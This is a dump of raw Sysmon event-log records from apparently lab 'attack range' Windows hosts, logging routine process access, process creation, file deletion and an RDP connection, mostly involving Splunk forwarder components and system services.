11:05:01.514{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295059Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:01.514{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295058Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:01.514{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-14DD-6216-B006-000000003802}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295057Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:01.515{C8EA50B7-14DD-6216-B006-000000003802}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000219267Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:59.308{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx53445-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219270Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:02.893{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57ED8B63549AB0E6946CFC929DC699BF,SHA256=34D971ED2310B65678976B0B0DE9297B8363AC4777F63F63B94204E2E3B42C8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295078Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:02.729{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10FC174A32E45DBF460B51EF9570FC84,SHA256=F4453FE445F8595820BEC6EEB5693AB8EFD46E3AF2AC6DE4941367A74EBB3602,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219269Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:02.425{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D9169622382E9297970F33B40E065588,SHA256=51F66C3CA2178C4590B165ACB653A911FDEE6FDCEE7C94AC1554531198973D51,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295077Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:02.598{C8EA50B7-14DE-6216-B106-000000003802}67206264C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295076Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:02.414{C8EA50B7-F2AD-6215-C000-000000003802}4856348C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295075Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:02.414{C8EA50B7-F2AD-6215-C000-000000003802}4856348C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295074Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:02.414{C8EA50B7-F2AD-6215-C000-000000003802}4856348C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295073Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:02.167{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-14DE-6216-B106-000000003802}6720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295072Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:02.151{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295071Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:02.151{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295070Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:02.151{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295069Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:02.151{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295068Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:02.151{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-14DE-6216-B106-000000003802}6720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295067Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:02.151{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-14DE-6216-B106-000000003802}6720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295066Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:02.150{C8EA50B7-14DE-6216-B106-000000003802}6720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000219271Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:03.987{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15652C3B7AD66C3A351A58F57E634064,SHA256=C0C9875BD8B586E92D3EFF118F6DBDE9BD473CE3384606DECFB14A4676B55AB5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295086Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:03.984{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295085Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:03.984{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295084Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:03.984{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295083Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:03.984{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295082Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:03.984{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-14DF-6216-B206-000000003802}6060C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295081Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:03.984{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-14DF-6216-B206-000000003802}6060C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295080Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:03.986{C8EA50B7-14DF-6216-B206-000000003802}6060C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000295079Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:03.750{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=515A1173E24EBB2230AF41282EDA013E,SHA256=339AA604CFBE3AF40BD154C59D764D071824B11ABE679212D2086E6FF97345CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295090Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:04.769{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23F2B4056A1FB0480CC7748B27A75492,SHA256=EED625D67742B5D76012CFE2D27AA944183441431E316E368C09371D1FCD67E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295089Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:02.492{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT 